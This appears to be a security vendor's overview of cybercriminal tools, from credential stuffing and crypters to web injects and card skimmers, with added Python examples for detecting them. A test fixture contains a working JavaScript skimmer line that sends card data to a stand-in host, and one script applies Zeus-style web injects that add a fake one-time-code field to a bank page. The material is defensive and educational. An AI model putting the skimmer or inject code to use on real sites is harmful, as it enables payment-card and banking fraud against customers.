Threats
Non-exhaustive list of threats
- Checkers : Checkers, like brute-forcers (see next point), try to find working passwords quickly and efficiently in order to gain access to IT applications with a legitimate user's rights. They are traded covertly for one very specific purpose: validating stolen credentials and taking over the accounts they unlock.
Using credentials obtained from stolen databases, attackers use checkers and brute-forcers to launch massive, automated login attempts against websites and any other reachable login page, in order to verify which credentials are still valid and to confirm unauthorized access (an attack commonly known as credential stuffing).
Checkers are automated tools (scripts or software) used by cybercriminals to test stolen username/password pairs against the authentication system of a website, an application, an application programming interface (API), etc.
These attacks are made far easier when victims re-use the same login information across several online platforms. The main reasons for password re-use are convenience (one password is easier to remember) and a poor understanding of the risks involved.
- Brute-Forcers : Where a checker replays credential pairs that are already known, a brute-forcer generates its own guesses: it submits large numbers of candidate passwords (taken from dictionaries, leaked password lists or systematic enumeration) against one or more accounts until a login succeeds. Like checkers, brute-forcers rely on automation to launch massive numbers of connection attempts against websites and other exposed login pages, and they are defeated by the same measures: rate limiting, account lockout or step-up authentication after repeated failures, and multi-factor authentication.
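The two behaviours described above (a checker spraying one known password per account, a brute-forcer hammering a single account) leave different footprints in authentication logs. The following script is an added example, not part of the original page and not VEEZO's code: it parses a constructed, assumed log format, counts attempts per source IP, and labels each source by how widely its attempts are spread across accounts. The thresholds and verdict names are assumptions for illustration.

```python
"""Classify failed-login bursts as credential stuffing or brute force.

Added example (not VEEZO's code): the log format, thresholds and sample
lines below are assumptions for illustration.
"""
import re
from collections import defaultdict

# Assumed log format: "<ISO timestamp> <src_ip> <username> <LOGIN_OK|LOGIN_FAIL>"
LOG_RE = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+) (\S+) (LOGIN_OK|LOGIN_FAIL)$")

# Constructed sample log: 203.0.113.5 replays one password per account
# (checker / credential stuffing); 198.51.100.9 hammers a single account
# (brute-forcer); 192.0.2.7 is an ordinary user who mistyped once.
SAMPLE_LOG = """\
2021-03-01T10:00:01Z 203.0.113.5 alice LOGIN_FAIL
2021-03-01T10:00:01Z 203.0.113.5 bob LOGIN_FAIL
2021-03-01T10:00:02Z 203.0.113.5 carol LOGIN_OK
2021-03-01T10:00:02Z 203.0.113.5 dave LOGIN_FAIL
2021-03-01T10:00:03Z 203.0.113.5 erin LOGIN_FAIL
2021-03-01T10:00:03Z 203.0.113.5 frank LOGIN_FAIL
2021-03-01T10:00:10Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:10Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:11Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:11Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:12Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:12Z 198.51.100.9 admin LOGIN_FAIL
2021-03-01T10:00:20Z 192.0.2.7 grace LOGIN_FAIL
2021-03-01T10:00:25Z 192.0.2.7 grace LOGIN_OK
"""


def parse_log(text):
    """Yield (ip, user, ok) tuples; silently skip lines that do not match."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group(2), m.group(3), m.group(4) == "LOGIN_OK"


def classify_sources(text, min_attempts=5, stuffing_ratio=0.8):
    """Return {ip: info} for every source IP seen in the log.

    Verdicts (assumed labels):
      'credential_stuffing' - attempts spread across many distinct accounts
                              (distinct users / attempts >= stuffing_ratio)
      'brute_force'         - attempts concentrated on few accounts
      'normal'              - below the attempt threshold
    'hits' lists the accounts a suspicious source actually logged into:
    a successful hit from a checker is the account to lock first.
    """
    attempts = defaultdict(list)
    for ip, user, ok in parse_log(text):
        attempts[ip].append((user, ok))

    verdicts = {}
    for ip, events in attempts.items():
        total = len(events)
        if total < min_attempts:
            verdicts[ip] = {"verdict": "normal", "attempts": total, "hits": []}
            continue
        distinct_users = {u for u, _ in events}
        hits = sorted(u for u, ok in events if ok)
        spread = len(distinct_users) / total
        verdict = "credential_stuffing" if spread >= stuffing_ratio else "brute_force"
        verdicts[ip] = {"verdict": verdict, "attempts": total, "hits": hits}
    return verdicts


if __name__ == "__main__":
    for ip, info in classify_sources(SAMPLE_LOG).items():
        print(ip, info)
```

The spread ratio is what separates the two tools: a checker touches many accounts once each, so per-account lockout never triggers, while a brute-forcer trips lockout on a single account but shows up as one IP with a near-zero spread. Real deployments would also key on user-agent and on success-after-many-failures, which this example leaves out.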
- Loaders : Loaders and Crypters (see next point) allow attackers to bypass antivirus software by hiding and delivering payloads.
The term "payload" is used figuratively to designate the part of a malicious program's executable code that is specifically intended to cause harm (as opposed to the code the malware uses to spread or replicate). Once attackers have identified a target, the next step is to introduce their code, such as malware, onto the targeted device or system.
Since targets are generally protected by antivirus software, which can recognize, report or block the payload of a malicious application, criminals commonly use special tools such as Loaders and Crypters.
These tools are designed to evade detection by endpoint security tools, allowing the malicious code or other applications to be downloaded and executed covertly. A loader's own capabilities are generally limited: its job is to fetch, stage and launch the real payload, not to carry out the attack itself.
- Crypters : Crypters are essential services for attackers involved in the spread of malware. They are used to encrypt and obfuscate malicious payloads so that they evade security solutions such as antivirus. Among other things, crypters can compress executables, make a payload pose as a legitimate program, and detect and evade sandbox analysis. The encrypted payload is wrapped in a small "stub" that decrypts and runs it in memory at execution time, so the file on disk never shows the original code.
To assist novice attackers who lack the technical expertise to deploy their own malware, crypter developers offer simple, intuitive graphical interfaces. Through these configuration panels, even a neophyte can select the desired options, such as where the payload is injected, the encryption method, and the keys.
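One side effect of encrypting a payload is that the ciphertext is statistically close to random, which a defender can measure. The script below is an added example, not part of the original page and not VEEZO's code: it computes Shannon entropy over fixed-size windows of a file and flags a file whose windows are mostly near 8 bits per byte, the pattern a crypted executable (small plain stub followed by an encrypted blob) leaves behind. The samples, the 7.2-bit threshold and the window size are assumptions for illustration; real tooling combines this signal with others, since compressed resources and legitimate packers also score high.

```python
"""Flag encrypted/packed executables by byte entropy.

Added example (not VEEZO's code). The 7.2-bit threshold and 4 KiB window
are assumptions; the "files" below are constructed, not real binaries.
"""
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy in bits per byte: 0.0 for a single repeated byte,
    8.0 for a perfectly uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data, window=4096, threshold=7.2):
    """Return (offset, entropy) for every window whose entropy exceeds threshold.

    Crypters typically leave a small, low-entropy decryption stub followed by
    a large encrypted blob, so the tail of the file lights up while the head
    does not.
    """
    out = []
    for off in range(0, len(data), window):
        h = shannon_entropy(data[off:off + window])
        if h > threshold:
            out.append((off, round(h, 2)))
    return out


def looks_crypted(data, window=4096, threshold=7.2, min_fraction=0.5):
    """True if at least min_fraction of the windows are above threshold."""
    n_windows = max(1, math.ceil(len(data) / window))
    return len(high_entropy_windows(data, window, threshold)) / n_windows >= min_fraction


def pseudo_random_bytes(n, seed=b"crypter-demo"):
    """Deterministic high-entropy filler (SHA-256 chain) standing in for an
    encrypted payload, so the example behaves the same on every run."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed samples: a "clean" file of repeated text and zero padding, and a
# "crypted" file made of a ~4 KiB plain stub followed by 15 KiB of ciphertext.
CLEAN_SAMPLE = b"MZ" + b"This program cannot be run in DOS mode.\r\n" * 200 + b"\x00" * 6000
STUB = b"\x55\x8b\xec" + b"decrypt-stub " * 320
CRYPTED_SAMPLE = STUB + pseudo_random_bytes(15 * 1024)

if __name__ == "__main__":
    print("clean   :", looks_crypted(CLEAN_SAMPLE), high_entropy_windows(CLEAN_SAMPLE))
    print("crypted :", looks_crypted(CRYPTED_SAMPLE), high_entropy_windows(CRYPTED_SAMPLE))
```

Per-window rather than whole-file entropy matters: averaged over the whole file, the stub and any padding pull the score down, whereas the windowed view shows exactly where the encrypted region starts, which is also where a sandbox or memory scanner should expect the real payload to appear once the stub has run.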
- Stealers : Stealers and Keyloggers gather information from victims' devices, such as personally identifiable information (PII), payment details and other sensitive data.
Stealers are very popular tools among cybercriminals for harvesting victims' sensitive information. Like crypters and loaders, they are often one link in a chain that installs further malicious payloads on victims' devices.
Their primary objective is to collect the credentials of online services and email clients, and files used by the victims (saved browser passwords, session cookies and cryptocurrency wallets are typical targets). Stealer authors provide not only the software, but also updates and premium customer support to guarantee that the spyware keeps working. Very attentive, isn't it?
- Keyloggers : A keylogger is a kind of spyware that records the keystrokes typed on the keyboard. Running silently in the background, one common technique is to save the keys to a "log" file and send it to an e-mail address or to a remote server, for example via FTP.
A keylogger first tries to establish persistence so that it starts as soon as the operating system has booted. It then uses operating-system APIs to intercept keyboard events (on Windows, typically a low-level keyboard hook or polling of key states), records every event as soon as a key is pressed, and periodically sends the collected data over the network.
- Injectors : An injector (or "web inject"), targeting online banking or other payment platforms, is an overlay on a legitimate site that looks like the original page. Its objective is to collect all kinds of information from a victim who is trying to visit the legitimate site. Very popular and widely available on the dark web, banking injections ("banking injects") are usually used together with banking Trojans, which insert JavaScript or HTML code into the legitimate bank page as it is loaded in the victim's browser.
This type of attack is commonly called "Man in the Browser". A banking Trojan can modify the content of a legitimate banking page in real time through API hooking. API hooking, in short, lets the malware alter the behaviour and flow of API calls (here, the browser's networking functions) and perform additional actions at specific moments, such as rewriting an HTTP response before the browser renders it. The content to be added to the page is described in a web-inject configuration file. This is generally hosted on a remote Command and Control (C&C) server and downloaded to the infected machine. The configuration file, encrypted and hidden to escape detection, can evolve quickly, and compromised devices automatically fetch configuration updates. Some web injects built into Trojans even allow full remote control of the compromised machine. The objective is to compromise both the victim's bank account and the transfers themselves, in order to steal money directly. Because the injected content runs inside the victim's authenticated session, some web injects can bypass two-factor authentication, for example by asking the victim to type a one-time code into a fake dialog. Web-inject developers sell on dark marketplaces both ready-to-use injection kits and lists of targets for which injects are available. The average price of such an injection kit is around €250.
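To make the mechanism concrete, the following script is an added example, not part of the original page and not code from any real Trojan: it models the widely documented Zeus-style web-inject configuration format (`set_url`, `data_before`, `data_inject`, `data_after`, `data_end`) and applies it to a page the way a hooked HTTP handler would before the browser renders it. The two rules show the classic tricks: adding a fake one-time-code field to the login form (to defeat two-factor authentication) and rewriting the displayed balance to hide a fraudulent transfer. The target URLs, pages and markup are constructed, and the replace-between-markers semantics is an assumption about the format.

```python
"""Apply a Man-in-the-Browser web-inject configuration to an HTML page.

Added example, not VEEZO's code and not taken from any real Trojan. It models
the Zeus-style "set_url / data_before / data_inject / data_after" text format:
for a matching URL, the content between `before` and `after` is replaced by
`inject`; if `after` is empty, `inject` is inserted right after `before`.
"""
import fnmatch
from dataclasses import dataclass


@dataclass
class Inject:
    url_pattern: str   # glob matched against the full URL
    flags: str         # e.g. "GP": apply to GET and POST (informational here)
    before: str = ""
    inject: str = ""
    after: str = ""


def parse_config(text):
    """Parse the text format into a list of Inject rules."""
    rules, current, section, buf = [], None, None, []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("set_url "):
            parts = stripped.split()
            current = Inject(url_pattern=parts[1], flags=parts[2] if len(parts) > 2 else "")
            rules.append(current)
        elif stripped in ("data_before", "data_inject", "data_after"):
            section, buf = stripped[len("data_"):], []      # -> before/inject/after
        elif stripped == "data_end":
            if current is not None and section:
                setattr(current, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def apply_injects(url, html, rules):
    """Rewrite html as the Trojan's hooked response handler would.

    Returns (rewritten_html, list_of_applied_url_patterns).
    """
    applied = []
    for rule in rules:
        if not fnmatch.fnmatchcase(url, rule.url_pattern):
            continue
        start = html.find(rule.before)
        if start < 0:
            continue
        start += len(rule.before)
        if rule.after:
            end = html.find(rule.after, start)
            if end < 0:
                continue
        else:
            end = start
        html = html[:start] + rule.inject + html[end:]
        applied.append(rule.url_pattern)
    return html, applied


# Constructed config: fake OTP prompt on the login page, inflated balance on
# the account page (the real balance is what remains after a hidden transfer).
SAMPLE_CONFIG = """\
set_url https://bank.example/login* GP
data_before
<input type="password" name="pw">
data_end
data_inject
<label>One-time code (SMS)</label><input type="text" name="otp">
data_end
data_after
data_end

set_url https://bank.example/account* G
data_before
<span id="balance">
data_end
data_inject
1,250.00
data_end
data_after
</span>
data_end
"""

SAMPLE_LOGIN_PAGE = (
    '<form action="/login" method="post">'
    '<input type="text" name="user">'
    '<input type="password" name="pw">'
    '<button>Sign in</button></form>'
)
SAMPLE_ACCOUNT_PAGE = '<p>Balance: <span id="balance">250.00</span></p>'

if __name__ == "__main__":
    rules = parse_config(SAMPLE_CONFIG)
    print(apply_injects("https://bank.example/login?x=1", SAMPLE_LOGIN_PAGE, rules))
    print(apply_injects("https://bank.example/account", SAMPLE_ACCOUNT_PAGE, rules))
```

The important property for defenders is that nothing here touches the bank's server or the TLS connection: the page is altered after decryption, inside the browser, so server-side controls and the padlock icon both look normal. Detection therefore has to happen on the endpoint or through out-of-band confirmation of transactions.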
- Exploit Kits : Exploit kits bundle several exploits so that they can be used together to target various vulnerabilities in different targets. An exploit is a piece of software that takes advantage of a security weakness left exposed by a person or by another piece of software. Exploit kits automate the exploitation of vulnerabilities in web browsers, browser plug-ins, operating systems and other applications.
They are also used as a delivery container for all types of malicious payloads, such as Trojans, loaders, ransomware and other malware.
They are typically delivered through malicious advertising (malvertising), compromised files with active content, or malicious links sent by email.
- SPAM : Spam and phishing (see next point) are tools that allow an attacker to reach and attract a very large number of potential victims. Spamming and phishing (including spear phishing) are often grouped together, but they are quite different techniques. Not a day goes by without automatically generated advertising landing in our mailboxes or appearing on our favourite websites as an invitation to shop online.
Spam bots are programs that seek out form fields and other interactive web page components (comment sections, forums, contact forms) in order to post spam advertisements at scale, using ever more creative techniques.
A spam campaign usually targets thousands of victims at the same time. Spam typically advertises online pharmacies, pornography, dating, gambling, "get rich quick" schemes such as working from home, hoaxes, etc.
- Phishing : Phishing is generally carried out in the same way as spamming, by sending emails to large numbers of recipients.
The technique relies on impersonating a legitimate identity. The goal of the attack is the theft of confidential information and, ultimately, the transfer of money to accounts controlled by cybercriminals. Phishing emails usually pretend to come from banks, credit card companies, online stores, auction sites or any other type of trusted organization.
The purpose of the email is to push the victim to click on a link (for example to "update a password" to avoid the suspension of an account) or to open an "important document" sent as an attachment.
The link, or the attachment itself, leads to a website that looks exactly like the official one but is in fact a fake site, carefully designed to deceive victims into entering personal information or downloading malicious content. Phishing remains one of the most popular attack vectors.
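Two of the indicators in the description above can be checked mechanically before a message reaches a user: a link whose visible text names the trusted brand's domain while its `href` points somewhere else, and an attachment whose extension can execute code. The script below is an added example, not part of the original page and not VEEZO's code; the sample message, the claimed sender domain and the list of risky extensions are constructed assumptions for illustration, and its domain comparison is deliberately crude (last two labels), which a production filter would replace with a public-suffix list.

```python
"""Spot phishing indicators in an HTML email.

Added example (not VEEZO's code). Flags links whose visible text names one
domain while the href targets another, links to domains other than the
claimed sender, and risky attachment names. Sample data is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed policy: extensions that can run code or smuggle executables.
RISKY_ATTACHMENT_RE = re.compile(r"\.(exe|scr|js|vbs|hta|docm|xlsm|iso|lnk)$", re.I)
# Something that looks like a hostname inside the visible link text.
DOMAIN_IN_TEXT_RE = re.compile(r"([a-z0-9-]+\.)+[a-z]{2,}", re.I)


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable(host):
    """Crude eTLD+1 (last two labels); fine for the demo, not for production."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def audit_email(html, claimed_sender_domain, attachments=()):
    """Return a list of (finding_kind, detail) tuples."""
    p = _LinkCollector()
    p.feed(html)
    findings = []
    for href, text in p.links:
        target = registrable(urlparse(href).netloc)
        m = DOMAIN_IN_TEXT_RE.search(text)
        if m and registrable(m.group(0)) != target:
            findings.append(("link_text_mismatch", f"{text} -> {href}"))
        elif target and target != registrable(claimed_sender_domain):
            findings.append(("link_off_brand", href))
    for name in attachments:
        if RISKY_ATTACHMENT_RE.search(name):
            findings.append(("risky_attachment", name))
    return findings


# Constructed sample: the visible URL says example-bank.com, the real target
# is a look-alike domain; the "statement" is a double-extension executable.
SAMPLE_EMAIL = """
<p>Dear customer, your account will be suspended. Please visit
<a href="https://secure-login.example-bank-verify.net/reset">https://www.example-bank.com/reset</a>
within 24 hours, or open the attached statement.</p>
<p><a href="https://www.example-bank.com/help">Help center</a></p>
"""

if __name__ == "__main__":
    for kind, detail in audit_email(SAMPLE_EMAIL, "example-bank.com", ["statement.pdf.exe"]):
        print(kind, detail)
```

The text-versus-target mismatch is the single most reliable of these checks, because the lure only works if the visible text is trustworthy while the destination is not; the "off-brand link" finding is noisier (newsletters legitimately link to tracking domains) and is best used as a scoring input rather than a block rule.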
- Bulletproof Hosting : To extend the lifetime of their criminal business, attackers rely on proxy and bulletproof hosting services.
Bulletproof hosting services guarantee the anonymity of malicious actors by offering protected hosting for their content. They obscure the origin of the content and make sure that it cannot be taken down by the authorities. These services often use geo-spoofing techniques to offer a wide range of IP addresses.
Geo-spoofing simply means hiding the real location of a server and making it appear to be elsewhere.
Basically, it comes down to changing the visible IP address. These hosting services are usually located in countries where regulations and laws are more permissive, so that the authorities there cannot disrupt the criminals' operations or prosecute them.
- Sniffers : Sniffers, usually active on online shopping sites, gather the personal and banking details of customers as they check out.
Credit card sniffers (also known as web skimmers) are malicious programs, usually written in JavaScript, designed to steal payment card data: card numbers, expiry dates, cardholder names and CVVs.
The CVV, the small 3-digit (4-digit on some cards) security code printed on a payment card, is what allows a stolen card number to be used for online purchases.
The technique is as follows:
1. The attacker finds a vulnerability in the shopping site (or in one of the third-party scripts it loads) that lets them modify the code served to customers.
2. They inject JavaScript code that automatically captures and collects the data of every customer who uses the checkout page (payment card, personal information, etc.).
3. The sniffer then transmits the stolen data to a server controlled by the attacker for further exploitation.
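Steps 2 and 3 above leave two things a site owner can look for in the checkout page itself: script tags loaded from other origins without Subresource Integrity (the usual foothold for step 1 when a third-party script is compromised), and inline script that reads card fields and then talks to the network. The following audit script is an added example, not part of the original page and not VEEZO's code; the checkout page, the field-name and API patterns, and the placeholder `integrity` value are constructed assumptions for illustration, and the result is a triage list, not proof of compromise.

```python
"""Audit a checkout page for web-skimmer risk indicators.

Added example (not VEEZO's code). Flags (a) scripts from third-party origins
without Subresource Integrity and (b) inline scripts that read card-like
fields and use a network API. Heuristics and the sample page are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicators: field names a skimmer harvests, and the browser APIs
# it uses to send them out (beacon, fetch, XHR, image-GET).
CARD_FIELD_RE = re.compile(r"(card|cc|cvv|cvc|expir|pan)", re.I)
EXFIL_API_RE = re.compile(r"(fetch\(|XMLHttpRequest|sendBeacon|new Image\(|\.src\s*=)", re.I)


class _ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []    # (src, has_integrity)
        self.inline = []      # script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_checkout_page(html, page_origin):
    """Return a list of findings ({'kind': ..., 'detail': ...})."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src, has_sri in p.external:
        host = urlparse(src).netloc
        if host and host != page_origin and not has_sri:
            findings.append({"kind": "third_party_script_without_sri", "detail": src})
    for body in p.inline:
        if CARD_FIELD_RE.search(body) and EXFIL_API_RE.search(body):
            findings.append({"kind": "inline_script_reads_card_fields_and_exfiltrates",
                             "detail": body.strip()[:80]})
    return findings


# Constructed checkout page: one first-party script, one third-party script
# pinned with SRI (placeholder hash), one unpinned third-party "analytics" tag,
# and an inline skimmer that ships card data out through an image request.
SAMPLE_CHECKOUT = """
<html><body>
<form id="pay"><input name="cardNumber"><input name="cvv"></form>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://cdn.example/jquery.min.js"
        integrity="sha384-AAAA" crossorigin="anonymous"></script>
<script src="https://static-analytics.example/tag.js"></script>
<script>
document.getElementById('pay').addEventListener('submit', function () {
  var d = { n: document.getElementsByName('cardNumber')[0].value,
            c: document.getElementsByName('cvv')[0].value };
  new Image().src = 'https://static-analytics.example/p.gif?q=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in audit_checkout_page(SAMPLE_CHECKOUT, "shop.example"):
        print(f["kind"], "-", f["detail"])
```

The complementary run-time control is a Content Security Policy on the checkout page whose `script-src` lists only the expected origins and whose `connect-src` and `img-src` exclude unknown hosts, so that even an injected script cannot complete step 3; this audit only tells you which scripts you would have to pin or remove to get there.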
- Database Theft : Stolen databases, sold on illegal platforms, give attackers access to the personal information of customers or users. The goal is to use this information to access internal systems (for example by re-using the stolen credentials, see Checkers above) or to commit other types of fraud.
- Underground Marketplace : The emergence of these markets has clearly accelerated the arrival of new players in the underground economy. It is no longer necessary to have much technical skill to commit fraud with a stolen credit card.
Basically, a criminal can simply download a plug-in, follow the basic instructions provided by the online store, pay a few hundred euros, buy a few credit cards, and start purchasing. In some cases, even the personal information of the card holders can be obtained in the same shop, which further facilitates fraudulent transactions. It is as simple as watching Netflix!
Some stores resell credentials for all kinds of stolen accounts, including banking, online stores, dating sites and any other type of account that can be used for fraudulent transactions online.
Criminals use the marketplaces' search engines to sort and filter the millions of available records by type of business, domain, or credential type. In addition, criminals can acquire the browser and device fingerprints of compromised systems, in order to impersonate a targeted device and evade the anti-fraud measures implemented by protection tools.
Some stores sell not only certificates and credentials for customer-facing applications but also those for enterprise VPNs.
Obviously, this is highly critical, as more sophisticated cybercriminals can use employees' credentials to access internal systems and corporate networks, and then carry out any kind of transaction or manipulation under the identity of a legitimate user.
See details in the attached document: VEEZO Threats & Mitigation 2021 UK,
Automation, a solution for IT security or a boon for criminals?
Threats in general
Threats are on the rise, but they are not necessarily where you expect them to be. Assessing the threat is an exercise that too few governmental or private organizations practise regularly. This evaluation should be continuous and should guide the rules and protection measures. It is the threat that allows us to evaluate the risk, and thus to measure the effort required to implement a security system in the right proportions. However, the threat is constantly evolving, because of the unpredictable behaviour of users and applications, sudden discoveries of weaknesses or vulnerabilities, the appearance of new exploitation techniques and tools, unnecessary or excessive exposure, and changes in the motivation and presence of hackers and criminal groups. Any effective system should be able to take the current threat into account when enforcing its protective measures.